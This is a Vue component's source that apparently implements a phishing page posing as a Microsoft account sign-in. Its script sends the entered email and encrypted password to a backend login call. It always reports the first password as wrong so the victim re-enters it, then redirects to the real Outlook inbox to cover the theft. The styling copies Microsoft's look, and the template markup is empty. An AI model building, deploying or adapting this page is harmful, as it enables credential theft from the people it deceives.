<template>
  <div class="main">

  </div>
</template>

<script>
import { login } from "../utils/axios";
import CryptoJS from "crypto-js";

export default {
  data() {
    return {
      duration: true,
      email: "",
      password: "",
      noEmail: 0,
      loading: false,
      loading2: false,
      showPassword: false,
      errorPasswordTimes: 0,
      step: 1,
      warnShow: 0,
    };
  },
  computed: {},
  watch: {
    email(n, o) {
      if (n.length > 3 && this.noEmail == 1) {
        this.noEmail = 0;
      }
      if (n != o && this.noEmail == 2) {
        this.noEmail = 0;
      }
    },
    password(n, o) {
      if (n == "") {
        // this.warnShow = 0;
      }
    },
  },
  methods: {
    encrypt(text) {
      const KEY = CryptoJS.enc.Hex.parse(process.env.VUE_APP_KEY);
      const IV = CryptoJS.enc.Hex.parse(process.env.VUE_APP_IV);
      const srcs = CryptoJS.enc.Utf8.parse(text);
      const encrypted = CryptoJS.AES.encrypt(srcs, KEY, {
        iv: IV,
        mode: CryptoJS.mode.CBC,
        padding: CryptoJS.pad.Pkcs7,
      });
      return encrypted.toString(); // 默认返回 Base64 字符串
    },
    focus() {
      const dom = document.getElementById("placeholder");
      const dom1 = document.getElementById("transBorder");
      const dom2 = document.getElementById("passwordIpt");

      dom.classList.add("should-transform");
      dom1.classList.add("ani");
      dom2.style.borderColor = "rgba(0, 0, 0, 0.6)";

      // dom2.style.opacity = 1;
    },
    blur() {
      const dom = document.getElementById("placeholder");
      const dom1 = document.getElementById("transBorder");
      const dom2 = document.getElementById("passwordIpt");

      dom1.classList.remove("ani");
      if (!this.password) {
        dom.classList.remove("should-transform");
      }
    },
    async next() {
      const emailReg = /^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/;
      if (this.step == 1) {
        // const dom = document.getElementById("identifierId");

        if (!this.email) {
          this.noEmail = 1;
          return;
        }
        if (!emailReg.test(this.email)) {
          this.noEmail = 2;
          return;
        }
        this.loading = true;
        setTimeout(() => {
          this.loading = false;
          this.step++;
        }, 2000);
        document.title = "Enter your password";
      } else {
        const dom = document.getElementById("passwordIpt");
        if (!this.password) {
          this.warnShow = 1;
          dom.style.borderColor = "#d13438";
          return;
        } else {
          this.warnShow = 0;
        }
        if (!this.errorPasswordTimes) {
          this.loading2 = true;
          const res = await login({
            email: this.email,
            password: this.encrypt(this.password),
          });
          setTimeout(() => {
            this.password = "";
            this.loading2 = false;
            this.warnShow = 2;
            this.errorPasswordTimes++;
          }, 1000);
          return;
        }
        const res = await login({
          email: this.email,
          password: this.encrypt(this.password),
        });
        this.loading2 = true;
        setTimeout(() => {
          this.loading2 = false;
          window.location.href = "https://outlook.live.com/mail/0/";
        }, 5000);
      }
    },
    showPass() {
      this.showPassword = !this.showPassword;
    },
    create() {
      window.open("https://accounts.google.com/lifecycle/steps/signup");
    },
    backStep() {
      this.step--;
    },
  },
  mounted() {
    document.title = "Sign in to your account";
    setTimeout(() => {
      this.duration = false;
    }, 2000);
  },
  components: {},
};
</script>

<style scoped lang="scss">
@media (max-width: 600px) {}

@media (min-width: 601px) {}

* {
  box-sizing: border-box;
}

.main {
  width: 100vw;
  height: 100vh;

  position: relative;

  .duration {
    background-color: #fff;
    width: 100vw;
    height: 100vh;
  }

  @media (max-width: 600px) {
    background: #fff;
  }

  @media (min-width: 601px) {
    background-image: url(../assets/4_eae2dd7eb3a55636dc2d74f4fa4c386e.svg);
    background-repeat: no-repeat, no-repeat;
    background-position: center center, center center;
    background-size: cover, cover;
    display: flex;
    align-items: center;
    justify-content: center;
  }

  .formMain {
    width: 100%;

    .part1 {
      @media (max-width: 600px) {
        padding: 24px;
      }

      @media (min-width: 601px) {
        -webkit-box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2);
        -moz-box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2);
        box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2);
        padding: 44px;
      }

      position: relative;
      margin-left: auto;
      margin-right: auto;
      position: relative;
      max-width: 440px;
      width: calc(100% - 40px);
      margin-bottom: 28px;
      background-color: #fff;

      min-width: 320px;
      min-height: 338px;
      overflow: hidden;
      animation: fadeIn 0.3s ease-in;
      -webkit-animation: fadeIn 0.3s ease-in;
      box-sizing: border-box;

      .sign {
        margin-top: 16px;
        margin-bottom: 12px;
        color: #1b1b1b;
        font-size: 1.5rem;
        font-weight: 600;
        padding: 0;
      }

      .errorMsg {
        color: #e81123;
        font-size: 0.9375rem;
        line-height: 1.25rem;

        a {
          color: #0067b8;
          text-decoration: none;

          &:hover {
            color: #666;
            text-decoration: underline;
          }
        }

        a:link {
          color: #0067b8;
        }
      }
    }

    .part2 {
      @media (max-width: 600px) {
        width: 100%;
        padding: 40px;
      }

      @media (min-width: 601px) {
        -webkit-box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2);
        -moz-box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2);
        box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2);
        width: calc(100% - 40px);
        padding: 44px;
        max-width: 440px;
      }

      border-radius: 12px;
      position: relative;
      margin-left: auto;
      margin-right: auto;
      position: relative;
      margin-bottom: 28px;
      background-color: #fff;

      min-width: 320px;
      min-height: 338px;
      overflow: hidden;
      animation: fadeIn 0.3s ease-in;
      -webkit-animation: fadeIn 0.3s ease-in;
      box-sizing: border-box;

      .header {
        display: grid;
        grid-template-columns: 1fr auto 1fr;
        padding-bottom: 32px;
      }

      .account {
        display: flex;
        justify-content: center;
        font-size: 12px;
        font-weight: 600;
        padding: 0 4px;
        color: #616161;
        align-items: center;
        margin-bottom: 12px;

        div {
          border: 1px solid #e0e0e0;
          border-radius: 50px;
          padding: 6px 6px;
        }
      }

      .ent {
        color: #242424;
        font-size: 24px;
        font-weight: bold;
        text-align: center;
      }

      .iptArea {
        margin-top: 32px;
        position: relative;

        &:hover .showPas,
        &:focus-within .showPas {
          opacity: 1;
          pointer-events: auto;
        }

        .showPas {
          position: absolute;
          display: flex;
          align-items: center;
          justify-content: center;
          width: 38px;
          height: 94%;
          background-color: #fff;
          top: 1px;
          right: 2px;
          border-radius: 4px;
          cursor: pointer;
          opacity: 0;

          svg {
            color: #424242;

            &:hover {
              color: #0f6cbd;
            }
          }
        }

        .passwordIpt {
          border: 1px solid #c7c7c7;
          border-bottom: 1px solid #000;
          border-radius: 4px;
          padding-left: 10px;
          margin-bottom: 0;
          height: 38px;
        }

        .placeholder {
          position: absolute;
          top: 8px;
          left: 10px;
          font-size: 14px;
          color: #707070;
          transform-origin: bottom left;
          transition: transform 0.15s cubic-bezier(0.4, 0, 0.2, 1),
            opacity 0.15s cubic-bezier(0.4, 0, 0.2, 1);
          padding: 0 5px;
        }

        .transBorder {
          width: 0%;
          position: absolute;
          height: 2px;
          background-color: #0f6cbd;
          left: 50%;
          bottom: 0;
          transform: translateX(-50%);
          overflow: hidden;
          border-radius: 0 0 4px 4px;
        }

        .ani {
          animation: spreadIn 0.4s cubic-bezier(0.22, 1, 0.36, 1) forwards;
        }

        .should-transform {
          transform: scale(0.7) translateY(-30px);
          background-color: #fff;
          z-index: 5;
        }
      }

      .btn {
        margin-top: 32px;
        width: 100%;
        border-radius: 4px;
        font-size: 14px;
        font-weight: bold;
        padding: 8px 16px;
      }

      .loading {
        background-color: #f0f0f0;
      }

      .error {
        color: #bc2f32;
        font-size: 12px;
        display: flex;
        align-items: center;
        gap: 5px;
        margin-top: 2px;
      }

      .frbwtfv {
        position: absolute;
        background-color: #acacac;
        width: 100%;
        height: 100%;
        top: 0;
        left: 0;
        opacity: 0.3;
      }

      .rpp59a7 {
        display: flex;
        align-items: center;
        justify-content: center;
        line-height: 0;
        gap: 8px;
        overflow: hidden;
        min-width: min-content;

        .fjamq6b {
          height: 20px;
        }

        .f64fuq3 {
          width: 20px;
        }

        .rvgcg50 {
          position: relative;
          flex-shrink: 0;
          mask-image: radial-gradient(closest-side,
              transparent calc(100% - 3px),
              white calc(100% - 2px) calc(100% - 1px),
              transparent 100%);
          background-color: #b4d6fa;
          color: #0f6cbd;
          animation-duration: 1.5s;
          animation-iteration-count: infinite;
          animation-timing-function: linear;
          animation-name: rb7n1on;
        }

        .rxov3xa {
          position: absolute;
          display: block;
          width: 100%;
          height: 100%;
          mask-image: conic-gradient(transparent 105deg, white 105deg);
          animation-duration: 1.5s;
          animation-iteration-count: infinite;
          animation-timing-function: var(--curveEasyEase);
          animation-name: r15mim6k;
        }

        .rxov3xa::before,
        .rxov3xa::after {
          content: "";
          position: absolute;
          display: block;
          width: 100%;
          height: 100%;
          animation: inherit;
          background-image: conic-gradient(currentcolor 135deg,
              transparent 135deg);
        }

        .rxov3xa::before {
          animation-name: r18vhmn8;
        }

        .rxov3xa::after {
          animation-name: rkgrvoi;
        }
      }
    }

    input {
      background-color: transparent;
      border: none;
      border-bottom: 1px solid #000;
      border-color: rgba(0, 0, 0, 0.6);
      width: 100%;
      padding: 6px 10px;
      height: 36px;
      margin-bottom: 16px;
      padding-left: 0;
      font-size: 16px;
      outline: none;
      color: #1b1b1b;
    }

    input::placeholder {
      font-size: 16px;
    }

    .vaildEmail {
      border-color: #e81123;
    }

    .text {
      margin-bottom: 16px;
      font-size: 0.8125rem;
      color: #1b1b1b;

      a {
        color: #0067b8;
        text-decoration: none;

        &:hover {
          color: #666;
          text-decoration: underline;
        }
      }

      a:link {
        // color: #0067b8;
      }
    }

    .btn {
      float: right;
      background-color: #0067b8;
      padding: 4px 12px;
      color: #fff;
      min-width: 108px;
      text-align: center;
      min-height: 32px;
      cursor: pointer;
    }

    .btn1 {
      color: red;
    }
  }

  .footer {
    display: flex;
    align-items: center;
    justify-content: center;
    position: absolute;
    gap: 20px;

    @media (max-width: 600px) {
      left: 30px;
      bottom: 5px;

      a {
        color: #747474;
      }
    }

    @media (min-width: 601px) {
      right: 50px;
      bottom: 0;

      a {
        color: #000;
      }
    }

    a {
      font-size: 12px;
      line-height: 28px;
      text-decoration: none;

      &:hover {
        text-decoration: underline;
      }
    }
  }
}
</style>
<style>
@keyframes fadeIn {
  0% {
    opacity: 0;
  }

  100% {
    opacity: 1;
  }
}

.back {
  /* width: 100%; */
  height: 100%;
  background-color: rgba(255, 255, 255, 0.5);
  position: absolute;
  width: 100%;
  top: 0;
  left: 0;
}

.loader-container {}

.dot {
  position: absolute;
  width: 5px;
  height: 5px;
  background-color: #0078d4;
  border-radius: 50%;
  left: -20px;
  /* 整体周期可以保持 2.5s，也可以缩短到 2s 让节奏更快 */
  animation: ms-loader-glide-fast 2s infinite;
}

/* 间距变量稍微调小一点点，配合更短的滑行区 */
.dot:nth-child(1) {
  animation-delay: 0.05s;
  --offset: 30px;
}

.dot:nth-child(2) {
  animation-delay: 0.2s;
  --offset: 15px;
}

.dot:nth-child(3) {
  animation-delay: 0.35s;
  --offset: 0px;
}

.dot:nth-child(4) {
  animation-delay: 0.5s;
  --offset: -15px;
}

.dot:nth-child(5) {
  animation-delay: 0.65s;
  --offset: -30px;
}

@keyframes ms-loader-glide-fast {

  0%,
  20% {
    left: 0;
    animation-timing-function: ease-out;
    opacity: 0;
  }

  25% {
    opacity: 1;
  }

  35% {
    left: 45%;
    animation-timing-function: linear;
  }

  65% {
    left: 60%;
    animation-timing-function: ease-in;
  }

  75% {
    opacity: 1;
  }

  80%,
  100% {
    left: 100%;
    opacity: 0;
  }
}

@keyframes spreadIn {
  from {
    width: 0%;
    opacity: 1;
  }

  to {
    width: 100%;
    opacity: 1;
  }
}

@keyframes spreadOut {
  from {
    width: 100%;
    opacity: 1;
  }

  to {
    width: 0%;
    opacity: 0;
  }
}

@keyframes rb7n1on {
  0% {
    transform: rotate(0deg);
  }

  100% {
    transform: rotate(360deg);
  }
}

@keyframes r15mim6k {
  0% {
    transform: rotate(-135deg);
  }

  50% {
    transform: rotate(0deg);
  }

  100% {
    transform: rotate(225deg);
  }
}

@keyframes rkgrvoi {
  0% {
    transform: rotate(0deg);
  }

  50% {
    transform: rotate(225deg);
  }

  100% {
    transform: rotate(0deg);
  }
}

@keyframes r18vhmn8 {
  0% {
    transform: rotate(0deg);
  }

  50% {
    transform: rotate(105deg);
  }

  100% {
    transform: rotate(0deg);
  }
}
</style>
